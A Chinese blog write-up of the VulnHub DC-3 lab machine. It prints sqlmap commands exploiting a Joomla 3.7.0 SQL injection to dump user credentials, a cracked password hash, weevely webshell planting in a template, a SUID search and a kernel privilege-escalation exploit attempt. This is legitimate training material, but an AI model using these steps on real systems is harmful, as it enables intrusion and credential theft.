vulnhub靶场 DC-3

于 2024-09-20 22:25:36 发布
阅读量186 收藏 3
点赞数 7
文章标签: vulnhub web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2302_80472909/article/details/142187432
版权

地址:
https://download.vulnhub.com/dc/DC-3-2.zip
开启NAT模式
namp只扫到了一个端口
在这里插入图片描述

打开网页有一个登录的页面
目录扫描一下,可以找到一个 后台登录界面在这里插入图片描述

看一下指纹信息
在这里插入图片描述
joomla cms
网上搜一下可以发现存在一个JoomScan工具
在kali上面安装一下
apt install joomscan

joomscan -u 扫一下, 发现它的版本为3.7.0
在这里插入图片描述

网上搜一下, 发现存在sql注入的漏洞

利用kali上面的工具
searchsploit joomla 3.7
在这里插入图片描述
找到这个漏洞文件, 照着sqlmap打, 换一下host
在这里插入图片描述

sqlmap -u "http://192.168.75.135/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

在这里插入图片描述

查表

sqlmap -u "http://192.168.75.135/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb --tables -p list[fullordering]

在这里插入图片描述

查列名

sqlmap -u "http://192.168.75.135/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T '#__users' --columns -p list[fullordering]

在这里插入图片描述

查看数据

sqlmap -u "http://192.168.75.135/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T '#__users' -C name,password,username --dump -p list[fullordering]

在这里插入图片描述得到的密码是经过加密的, 用john爆破一下
$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu
放到1.txt中, 然后爆破
jonh 1.txt 得到密码: snoopy
在这里插入图片描述

用之前扫到的后台路径, 可以登录进去
在这里插入图片描述

再模板里面可以新建文件, 可以上传文件, 也可以直接更改文件的代码
使用weevely生成一个木马
https://blog.csdn.net/qq_45521281/article/details/106587791
在这里插入图片描述

将木马插入到index.php里面去
在这里插入图片描述

使用weevely进行连接weevely "http://192.168.75.135/index.php?tp=1&templateStyle=4" 1
在这里插入图片描述
其实也可以直接新建一个比如 1.php
然后写上一句话马, 或者反弹shell啥的,
访问到这个目录 /templates/beez3/1.php也就能够连上了
(我就是不知道如何找到这个目录的,有点懵)
连上去后, 权限比较低, 需要提权

看看是否有suid提权
find / -user root -perm -4000 -print 2>/dev/null
但是没找到可以用的
在这里插入图片描述

uname -a 看看系统信息, 看看内核版本在这里插入图片描述看看系统版本 cat /etc/*-release
在这里插入图片描述

找找这个版本是否存在一些漏洞

searchsploit ubuntu 16.04
在这里插入图片描述看到39772.txt
在这里插入图片描述访问相应的url, 下载到shell上面(一个39772.zip文件)
在这里插入图片描述

unzip 39772.zip   #解压
cd 39772
tar -xvf exploit.tar   # 解压

前面的文件下载那里是给了使用的教程的
在这里插入图片描述

cd ebpf_mapfd_doubleput_exploit
./compile.sh
./doubleput

不知道为啥, 好像没有用
在这里插入图片描述

拿蚁剑连了一下, 重新上传了一下zip文件也是一样的, 不知道为啥
在这里插入图片描述

我看别人也是这个一样的回显啊, 咋别人就成root了, 我这就不行呢?
在这里插入图片描述

参考文章:
https://www.cnblogs.com/1-Ry/p/15075074.html
https://www.cnblogs.com/shadowink/p/14730761.html

pwfortune
关注
vulnhub靶场DC-3
qq_58091216的博客
01-08 1364
如果您的网站正在运行 Joomla,您可以对您的网站使用 JoomScan 实用程序来发现漏洞或仅提供有助于攻击您网站的一般信息。漏洞扫描器(JoomScan)是一个开源项目,其主要目的是实现漏洞检测的自动化,以增强Joomla CMS开发的安全性。与以前的 DC 版本一样,这个版本是为初学者设计的,尽管这一次只有一个标志,一个入口点,根本没有任何线索。Linux 技能和对 Linux 命令行的熟悉是必须的,对基本渗透测试工具的一些经验也是必须的。我们可以看到用户名爆破出来了,密码是加密的,我们进行解密。
Vulnhub靶场----9、DC-9
七天
03-03 792
Vulnhub-DC9
Vulnhub靶场DC-3
qq_34942239的博客
01-26 519
然后连接 weevely http://192.168.223.139/templates/beez3/html/modules.php x。注意目录是/templates/beez3/html/modules.php。翻了一圈没找到可以利用的文件,看了别人的wp发现是Ubuntu这个版本有漏洞。发现弹不过来,不知道什么问题。(后来发现是靶机的nc 没有-e功能)比较重要的就是这个版本3.7.0,搜一下看看有没有漏洞。最后老失败,不知道为什么,晕,基本完成了…不太管用,换个txt文件看看怎么个回事。
Vulnhub靶场 | DC系列 - DC3
哦 卷!
08-30 761
浏览器访问目标网站的 error.php文件(写入马的文件):http://192.168.10.149/templates/protostar/error.php。在msf中搜索joomla相关的脚本,使用joomla_version探测下joomla的版本。文本写的是漏洞产生的原因、描述和漏洞利用的方法,还附上了exp,就是最后一行的链接。根据joomla的特性,可以在模版中编辑模版文件,所以可以利用这一点进行写马。查找一下设置了suid的文件,并没有可以提权的命令。但是获取到的shell权限比较低。
vulnhub靶场 DC-1靶机 渗透详细过程
黑战士的博客
07-26 1093
1.扫描局域网主机netdiscover用法2.开放端口扫描2.MSF使用3.hydra爆破:sudo hydra -l flag4 -P /usr/share/wordlists/rockyou.txt.gz ssh://192.168.0.100hydra+John密码包以上两种方式可以爆出flag4的密码4.suid提权:Linux下用SUID提权、find命令exec。
Vulnhub-DC-1实战靶场
ierciyuan的博客
10-12 2686
本次靶场实战涉及信息收集、漏洞查找与利用、getshell、数据库渗透、密码破解、linux提权,并找到官方设计的5个flag。
vulnhub靶场 DC-3靶机 渗透详细过程
黑战士的博客
07-26 1325
啰嗦两句:提权之前完成是一个月前做的,当时在提权处出了点问题就搁置了,今天才完成,所以IP地址可能会会有变化注意:后续出现的IP地址为192.168.200.55同样是靶机IP地址,若本文能有帮助到你的地方,不胜荣幸。
Vulnhub靶场实战---DC-9
一期一会的博客
12-23 2335
​ 0x00 环境准备 1.官网下载地址: https://www.vulnhub.com/entry/dc-9,412/ 2.下载完成之后直接导入vm,使用NAT模式连接,保持在同一网段 攻击机:kali (192.168.88.130) 靶机:DC-8 (192.168.88.132) 0x01 信息收集 老办法,使用arp-scan -l 找到目标主机,目标主机ip为192.168.88.132 查看开放端口,22端口被过滤,登录80端口查看 nmap -sV -p- -A 192.168.88.
Vulnhub靶场DC-3-2练习
Reset
07-14 761
netdiscover发现目标主机ip。nmap探测目标主机的开放端口和服务。dirsearch探索站点目录,发现后台入口。确定cms版本joomla3.7.0。searchsploit搜索joomla相关漏洞CVE-2017-8917。sqlmap跑数据库,得到管理员的名字和密码。john破解hash。php一句话木马。反弹shell。利用linux内核相关漏洞提权。
vulnhub靶场实战系列-DC-3实战
05-20
vulnhub靶场实战系列-DC-3实战
vulnhub靶场实战系列-DC-2实战
05-18
vulnhub靶场实战系列-DC-2实战
Vulnhub靶场实战---DC-7
一期一会的博客
01-18 3280
0x00 环境准备 1.靶场下载官网地址 https://www.vulnhub.com/entry/dc-7,356/ 2.下载完成以后直接导入vm,kali,靶机均使用均使用NAT模式连接, 攻击机:kali 192.168.88.130 靶机:DC-7 192.168.88.133 0x01 信息收集 1.探测88网段主机,使用nmap扫描。 -sn Ping探测扫描主机,不进行端口扫描(测试过对方主机把icmp包都丢弃掉,依然能检测到对方开机状态) -sp 进行Ping扫描 -sA
基于asp.net的房地产管理系统设计与实现.docx
09-29
基于asp.net的房地产管理系统设计与实现.docx
基于asp.net的小型企业办公耗材库存管理系统设计与实现.docx
09-29
基于asp.net的小型企业办公耗材库存管理系统设计与实现.docx
基于Vue和Element的电脑配件管理系统设计源码
09-29
该项目为基于Vue和Element UI框架构建的电脑配件管理系统源码,包含89个文件,涉及32个JavaScript文件、20个Vue组件文件、12个SVG图标文件、6个SCSS样式文件、3个PNG图片文件、2个YAML配置文件、2个Markdown文件、2个JPG图片文件、1个EditorConfig配置文件以及1个开发相关文件。该系统主要使用JavaScript和Vue进行开发,辅以HTML和SVG技术,旨在提供一套高效便捷的电脑配件管理解决方案。
非标自动化设备【B81】.zip
09-29
非标自动化设备【B81】.zip
网络安全 - JWT 密钥爆破 - CrackingJWTKeys.py
09-29
JWT(JSON Web Token)是一种广泛用于身份验证和信息交换的开放标准。然而,JWT的安全性在很大程度上依赖于其签名的有效性,而签名的有效性又依赖于密钥的保密性。因此,保护JWT密钥不被破解至关重要。`CrackingJWTKeys.py`是一个用于破解JWT密钥的工具,它可以帮助安全专家评估JWT实现的安全性。 ### 什么是JWT密钥爆破? JWT密钥爆破是一种尝试通过尝试多种可能的密钥来破解JWT签名的方法。如果攻击者能够破解密钥,他们就可以伪造令牌,从而冒充其他用户或访问受限资源。这通常涉及到尝试使用一个预先定义的单词列表(字典攻击)或者使用暴力破解方法来猜测密钥。 ### `CrackingJWTKeys.py`的作用 `CrackingJWTKeys.py`工具旨在帮助安全研究人员和渗透测试人员识别JWT实现中的弱点。它可以通过以下方式帮助识别这些弱点: 1. **字典攻击**:使用一个预先定义的密码列表尝试破解密钥。 2. **暴力破解**:尝试所有可能的密钥组合直到找到正确的一个。 3. **密钥混淆攻击**:尝试利用已知的漏洞,如CVE-2016-
绿色环保助手app开发
最新发布
09-29
Android app 大学生 环保助手app开发
VulnHub入门教程:DC-1靶场攻破指南
"DC-1 是一个专门为渗透测试学习设计的漏洞靶场,由 ins1ght 作者提供,适合初级者。靶机于2019年2月28日发布,包含五个旗标,最终目标是找到并读取 root 用户主目录中的旗标,可能需要具备 Linux 技能、熟悉 Linux ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值